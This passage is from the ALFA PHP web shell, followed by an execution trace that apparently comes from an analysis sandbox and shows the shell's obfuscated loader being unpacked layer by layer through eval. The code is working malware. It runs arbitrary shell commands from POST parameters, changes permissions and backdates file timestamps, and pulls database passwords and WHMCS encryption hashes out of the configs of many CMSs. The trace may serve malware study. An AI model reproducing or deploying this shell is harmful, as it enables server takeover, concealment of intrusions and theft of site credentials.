                curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
                curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
            }
            if ($this->proxy) {
                curl_setopt($process, CURLOPT_PROXY, $this->proxy);
            }
            if ($method == 'post') {
                curl_setopt($process, CURLOPT_POSTFIELDS, $data);
                curl_setopt($process, CURLOPT_POST, 1);
                curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
            }
            $return = @curl_exec($process);
            curl_close($process);
            return $return;
        }
        function error($error)
        {
            echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>{$error}</div></center>";
            die;
        }
    }
    function getConfigHtml($cms)
    {
        $content = '';
        $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF");
        $content = "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
        foreach ($cms_array as $key => $val) {
            $content .= "<option value='{$key}' " . ($key == $cms ? 'selected=selected' : '') . ">{$val}</option>";
        }
        $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER['DOCUMENT_ROOT'] . "/' size='30' /> <button class='button'>GetConfig</button>";
        $content .= "</form>";
        return $content;
    }
    if (!function_exists('json_encode')) {
        function json_encode($a = false)
        {
            if (is_null($a)) {
                return "null";
            }
            if ($a === false) {
                return "false";
            }
            if ($a === true) {
                return "true";
            }
            if (is_scalar($a)) {
                if (is_float($a)) {
                    return floatval(str_replace(",", ".", strval($a)));
                }
                if (is_string($a)) {
                    static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\\"'));
                    return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
                } else {
                    return $a;
                }
            }
            $isList = true;
            for ($i = 0, reset($a); $i < count($a); $i++, next($a)) {
                if (key($a) !== $i) {
                    $isList = false;
                    break;
                }
            }
            $result = array();
            if ($isList) {
                foreach ($a as $v) {
                    $result[] = json_encode($v);
                }
                return '[' . join(',', $result) . ']';
            } else {
                foreach ($a as $k => $v) {
                    $result[] = json_encode($k) . ':' . json_encode($v);
                }
                return '{' . join(',', $result) . '}';
            }
        }
    }
    if (!function_exists('json_decode')) {
        function json_decode($json, $array = true)
        {
            $comment = false;
            $out = '$x=';
            for ($i = 0; $i < strlen($json); $i++) {
                if (!$comment) {
                    if ($json[$i] == '{' || $json[$i] == '[') {
                        $out .= ' array(';
                    } else {
                        if ($json[$i] == '}' || $json[$i] == ']') {
                            $out .= ')';
                        } else {
                            if ($json[$i] == ':') {
                                $out .= '=>';
                            } else {
                                $out .= $json[$i];
                            }
                        }
                    }
                } else {
                    $out .= $json[$i];
                }
                if ($json[$i] == '"') {
                    $comment = !$comment;
                }
            }
            eval($out . ';');
            return $x;
        }
    }
    function alfaterminalExec()
    {
        $pwd = "pwd";
        $seperator = ";";
        if ($GLOBALS['sys'] != 'unix') {
            $pwd = "cd";
            $seperator = "&";
        }
        if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
            $cmd = "cd '" . addslashes($_POST["c"]) . "'" . $seperator;
        }
        $current_path = '';
        if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}" . $seperator . "|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)) {
            if (empty($match[1])) {
                $match[1] = $match[2];
            }
            $current_path = alfaEx("cd " . addslashes($match[1]) . $seperator . $pwd);
            $current_path = str_replace("\\", "/", $current_path);
        }
        $out = alfaEx($cmd . $_POST['alfa1'], true);
        $out = htmlspecialchars($out);
        echo json_encode(array("output" => convertBash($out), "path" => $current_path));
    }
    function convertBash($code)
    {
        $dictionary = array('[01;30m' => '<span style="color:black">', '[01;31m' => '<span style="color:red">', '[01;32m' => '<span style="color:green">', '[01;33m' => '<span style="color:yellow">', '[01;34m' => '<span style="color:blue">', '[01;35m' => '<span style="color:purple">', '[01;36m' => '<span style="color:cyan">', '[01;37m' => '<span style="color:white">', '[0m' => '</span>');
        $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
        return $htmlString;
    }
    function alfadoActions()
    {
        $chdir_fals = false;
        if (!@chdir($_POST['c'])) {
            $chdir_fals = true;
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
        }
        if (isset($_POST['alfa1'])) {
            $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
        }
        if (isset($_POST['alfa2'])) {
            $_POST['alfa2'] = rawurldecode($_POST['alfa2']);
        }
        $action = $_POST["alfa3"];
        if ($action == "permission") {
            $perms = 0;
            $perm = $_POST["alfa2"];
            for ($i = strlen($perm) - 1; $i >= 0; --$i) {
                $perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1);
            }
            if (@chmod($_POST['alfa1'], $perms)) {
                echo "done";
            } else {
                echo "no";
            }
            return;
        }
        if ($action == "rename" || $action == "move") {
            $alfa1_decoded = $_POST['alfa1'];
            if ($chdir_fals) {
                $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
            }
            $_POST['alfa1'] = trim($_POST['alfa1']);
            $alfa1_escape = addslashes($_POST["alfa1"]);
            if ($_POST["alfa3"] == "rename") {
                $_POST['alfa2'] = basename($_POST['alfa2']);
            }
            if (!empty($_POST['alfa2'])) {
                $cmd_rename = false;
                if ($chdir_fals && $alfa_canruncmd) {
                    if (_alfa_is_writable($_POST['alfa1'])) {
                        $cmd_rename = true;
                        $alfa1_escape = addslashes($alfa1_decoded);
                        alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa2']) . "'");
                    }
                }
                if (!file_exists($_POST['alfa2'])) {
                    if (@rename($_POST['alfa1'], $_POST['alfa2']) || $cmd_rename) {
                        echo "done";
                    } else {
                        echo "no";
                    }
                } else {
                    echo "no";
                }
            }
        } elseif ($action == "copy") {
            if (is_dir($_POST["alfa1"])) {
                $dir = str_replace('//', '/', $_POST["alfa1"]);
                $dir = explode('/', $dir);
                if (empty($dir[count($dir) - 1])) {
                    $name = $dir[count($dir) - 2];
                } else {
                    $name = $dir[count($dir) - 1];
                }
            } else {
                $name = basename($_POST["alfa1"]);
            }
            $dir = dirname($_POST["alfa1"]);
            if ($dir == ".") {
                $dir = $_POST["c"] . "/";
            }
            if (is_file($_POST["alfa1"])) {
                @copy($_POST["alfa1"], $_POST["alfa2"]);
                echo "done";
            } elseif (is_dir($_POST["alfa1"])) {
                if (!is_dir($_POST["alfa2"])) {
                    mkdir($_POST["alfa2"], 0755, true);
                }
                copy_paste($dir, $name, $_POST["alfa2"] . "/");
                echo "done";
            }
        } elseif ($action == "modify") {
            if (!empty($_POST['alfa1'])) {
                $time = strtotime($_POST['alfa1']);
                if ($time) {
                    $touched = false;
                    if ($chdir_fals && $alfa_canruncmd) {
                        alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa1'])) . "' '" . addslashes($_POST['alfa2']) . "'");
                        $touched = true;
                    }
                    if (!@touch($_POST['alfa2'], $time, $time) && !$touched) {
                        echo "no";
                    } else {
                        echo "ok";
                    }
                } else {
                    echo "badtime";
                }
            }
        }
    }
    function alfaget_flags()
    {
        $flags = array();
        if (function_exists("curl_version")) {
            $curl = new AlfaCURL();
            $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"];
            $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
            $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
            if (strpos($flag2, "geoplugin") != false) {
                $flag = json_decode($flag, true);
                $flag2 = json_decode($flag2, true);
                if (!empty($flag['geoplugin_countryCode'])) {
                    $flags["server"]["name"] = $flag['geoplugin_countryName'];
                    $flags["server"]["code"] = $flag['geoplugin_countryCode'];
                }
                if (!empty($flag2['geoplugin_countryCode'])) {
                    $flags["client"]["name"] = $flag2['geoplugin_countryName'];
                    $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
                }
            }
        }
        echo json_encode($flags);
    }
    function alfaGetConfig()
    {
        $cms = $_POST['alfa1'];
        $path = trim($_POST['alfa2']);
        $config = array('wp' => array('file' => '/wp-config.php', 'host' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbname' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbuser' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbpw' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'prefix' => array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 1)), 'drupal' => array('file' => '/config.php', 'host' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbname' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbuser' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbpw' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'prefix' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1)), 'drupal2' => array('file' => '/sites/default/settings.php', 'host' => array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbname' => array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbuser' => array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbpw' => array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'prefix' => array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1)), 'vb' => array('file' => '/includes/config.php', 'host' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")servername(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbuser' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")username(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbname' => array("/config\\[(?:'|\")Database(?:'|\")\\]\\[(?:'|\")dbname(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbpw' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")password(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'prefix' => array("/config\\[(?:'|\")Database(?:'|\")\\]\\[(?:'|\")tableprefix(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3)), 'phpnuke' => array('file' => '/config.php', 'host' => array('/dbhost(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbname' => array('/dbname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbuser' => array('/dbuname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbpw' => array('/dbpass(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'prefix' => array('/prefix(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3)), 'smf' => array('file' => '/Settings.php', 'host' => array("/db_server(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_passwd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/db_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'whmcs' => array('file' => '/configuration.php', 'host' => array("/db_host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_username(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'cc_encryption_hash' => array("/cc_encryption_hash(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'joomla' => array('file' => '/configuration.php', 'host' => array("/\\\$host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/\\\$db(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/\\\$user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/\\\$password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/\\\$dbprefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'phpbb' => array('file' => '/config.php', 'host' => array("/dbhost(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/dbname(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/dbuser(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/dbpasswd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/table_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'mybb' => array('file' => '/inc/config.php', 'host' => array("/config\\['database'\\]\\['hostname'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/config\\['database'\\]\\['database'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/config\\['database'\\]\\['username'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/config\\['database'\\]\\['password'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/config\\['database'\\]\\['table_prefix'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)));
        if ($cms == "drupal") {
            $file = $config[$cms]['file'];
            $file = $path . $file;
            if (@is_file($file) || _alfa_is_dir($file, "-e")) {
            } else {
                $cms = 'drupal2';
            }
        }
        if ($cms == "vb") {
            $file = $config[$cms]['file'];
            $file = $path . $file;
            if (@is_file($file) || _alfa_is_dir($file, "-e")) {
            } else {
                $path .= '/core';
            }
        }
        $data = array();
        $srch_host = $config[$cms]['host'][0];
        $srch_user = $config[$cms]['dbuser'][0];
        $srch_name = $config[$cms]['dbname'][0];
        $srch_pw = $config[$cms]['dbpw'][0];
        $prefix = $config[$cms]['prefix'][0];
        $file = $config[$cms]['file'];
        $chost = $config[$cms]['host'][1];
        $cuser = $config[$cms]['dbuser'][1];
        $cname = $config[$cms]['dbname'][1];
        $cpw = $config[$cms]['dbpw'][1];
        $cprefix = $config[$cms]['prefix'][1];
        if (@is_dir($path) || _alfa_is_dir($path)) {
            $file = $path . $file;
        } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) {
            $file = $path;
        } else {
            return false;
        }
        $file = __read_file($file);
        if ($cms == "drupal2") {
            $file = preg_replace("/\\@code(.*?)\\@endcode/s", "", $file);
        } elseif ($cms == "vb") {
            $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
        }
        if (preg_match($srch_host, $file, $mach)) {
            $data['host'] = $mach[$chost];
        }
        if (preg_match($srch_user, $file, $mach)) {
            $data['user'] = $mach[$cuser];
        }
        if (preg_match($srch_name, $file, $mach)) {
            $data['dbname'] = $mach[$cname];
        }
        if (preg_match($srch_pw, $file, $mach)) {
            $data['password'] = $mach[$cpw];
        }
        if (isset($prefix)) {
            if (preg_match($prefix, $file, $mach)) {
                $data['prefix'] = $mach[$cprefix];
            }
        }
        if ($cms == 'whmcs') {
            if (preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)) {
                $data['cc_encryption_hash'] = $mach[3];
            }
        }
        echo json_encode($data);
    }
    if (empty($_POST['a'])) {
        if (isset($default_action) && function_exists('alfa' . $default_action)) {
            $_POST['a'] = $default_action;
        } else {
            $_POST['a'] = 'FilesMan2';
        }
    }
    //'FilesMan';
    if (!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) {
        call_user_func('alfa' . $_POST['a']);
    }
    exit;
};
exit;

Execution traces

data/traces/070fa29ffedbb4b65a80ab4fae827821_trace-1676243728.3943.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:15:54.292133]
1	0	1	0.000178	393528
1	3	0	0.001232	574632	{main}	1		/var/www/html/uploads/alfav4-1.php	0	0
1		A						/var/www/html/uploads/alfav4-1.php	3	$tool = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/alfav4-1.php	4	$gzinflate = '=0C/vf5B9PFz/w/fPTf88bPmTmMyuEi6ya94RVr5sgiAwQCYe/sd5hWQBaSV0KTCYQn/rkyXA74/V2BKDfYDrTnkfN+ErNgmfMDE/9s/NQGGldcAWJbRramq+GqowfGNf7AD8Yo5pn8hjV3BP4JUIbEG1oxhs39i3G6nRe0GkS8i9QwTfbXUeaiZu4TOdBxXiZ3+zGF7SeEDpDJvjee2XeTnxKVxZQDPuVJaKwVmNzXl5YFYU7g8cfjd1au87psfTLHAAyjepq7/Bd/5tjJaoHtQE/Am5PilS4ZNlt4Mk8c0+pk9GtNvyUWxPlEnugVnLTOf4o3032abeRb3VqPy01WUn3Rydqq+tay7qPUc5qBuvLNPeNN8tYTNlMkDqTjtkl5u4rBHVmvrhir25OPDKDVa8PRNtGBPifh7c9kUNaYUdTWxDuC+MNZJLpAWZlWcWZ9l80G1SBjsqR51QTz7lo38XkG3LfqrvcbNNdwZr9jMevNxZNR0j1nVI811EW+r'
2	4	0	0.001404	574632	base64_decode	0		/var/www/html/uploads/alfav4-1.php	5	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.001427	574920
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.001448	574888	urldecode	0		/var/www/html/uploads/alfav4-1.php	5	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.001468	575144
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.001488	574856	htmlspecialchars_decode	0		/var/www/html/uploads/alfav4-1.php	5	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.001507	575080
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.001537	577208	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/alfav4-1.php	5	0
3	8	0	0.001555	577208	strrev	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'=0C/vf5B9PFz/w/fPTf88bPmTmMyuEi6ya94RVr5sgiAwQCYe/sd5hWQBaSV0KTCYQn/rkyXA74/V2BKDfYDrTnkfN+ErNgmfMDE/9s/NQGGldcAWJbRramq+GqowfGNf7AD8Yo5pn8hjV3BP4JUIbEG1oxhs39i3G6nRe0GkS8i9QwTfbXUeaiZu4TOdBxXiZ3+zGF7SeEDpDJvjee2XeTnxKVxZQDPuVJaKwVmNzXl5YFYU7g8cfjd1au87psfTLHAAyjepq7/Bd/5tjJaoHtQE/Am5PilS4ZNlt4Mk8c0+pk9GtNvyUWxPlEnugVnLTOf4o3032abeRb3VqPy01WUn3Rydqq+tay7qPUc5qBuvLNPeNN8tYTNlMkDqTjtkl5u4rBHVmvrhir25OPDKDVa8PRNtGBPifh7c9kUNaYUdTWxDuC+MNZJLpAWZlWcWZ9l80G1SBjsqR51QTz7lo38XkG3LfqrvcbNNdwZr9jMevNxZNR0j1nVI811EW+r'
3	8	1	0.001737	757464
3	8	R			'AD2Awn8APIDDfwA3gMh/eJwAN4DIf3ic7L17X+LKsjD89+zfb3+HTJZ7gC1y94IMOop4G+/idfThBAgQBcIkQUSX57O/VdXdSScExFmzzjnP857Zewn0tbq6urqqurr663q/3f/nP77Zum0bZq9qO5rlRGMFSNIty7Sqlt43LcfotaIpTA1NnNOUohL5ik0p8J/Ra5rUBOS0XiBLvb2+bddKF6Nj+O+ot52uZU87h6k9+O+mc/hw22uULl5ODV/e4DbbT9e6R0+1683R7fXRy35lLzchrV/r3to312edWX7fdLdfbis3qevMWecmk3+8PQe4do9S9d5+p2FwGHcaS9rVYre2s52i/On/vZy2ikW1QMOFwXc0R8dRFx+P+ofO7nJ6vvNw8mjfHtZL9WH9+3y2udW5aj0uH1mbw+Oz0+TVTfJl89jcPMpdL17eHtg7zaY9SG8t7zjNo/ndjeRDs57rdHbsk4eH/XztpvHS7F8Pyt/ri53W1Xl7a+PhZm9v'
3	9	0	0.001873	757432	base64_decode	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'AD2Awn8APIDDfwA3gMh/eJwAN4DIf3ic7L17X+LKsjD89+zfb3+HTJZ7gC1y94IMOop4G+/idfThBAgQBcIkQUSX57O/VdXdSScExFmzzjnP857Zewn0tbq6urqqurr663q/3f/nP77Zum0bZq9qO5rlRGMFSNIty7Sqlt43LcfotaIpTA1NnNOUohL5ik0p8J/Ra5rUBOS0XiBLvb2+bddKF6Nj+O+ot52uZU87h6k9+O+mc/hw22uULl5ODV/e4DbbT9e6R0+1683R7fXRy35lLzchrV/r3to312edWX7fdLdfbis3qevMWecmk3+8PQe4do9S9d5+p2FwGHcaS9rVYre2s52i/On/vZy2ikW1QMOFwXc0R8dRFx+P+ofO7nJ6vvNw8mjfHtZL9WH9+3y2udW5aj0uH1mbw+Oz0+TVTfJl89jcPMpdL17eHtg7zaY9SG8t7zjNo/ndjeRDs57rdHbsk4eH/XztpvHS7F8Pyt/ri53W1Xl7a+PhZm9v'
3	9	1	0.002419	937688
3	9	R			'\000=��\000<��\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~��'
3	10	0	0.004856	757432	gzinflate	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'\000=��\000<��\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~��'
3	10	1	0.007303	892632
3	10	R			'\000<��\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\'
3	11	0	0.009742	712376	gzinflate	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'\000<��\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\'
3	11	1	0.012308	847576
3	11	R			'\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{'
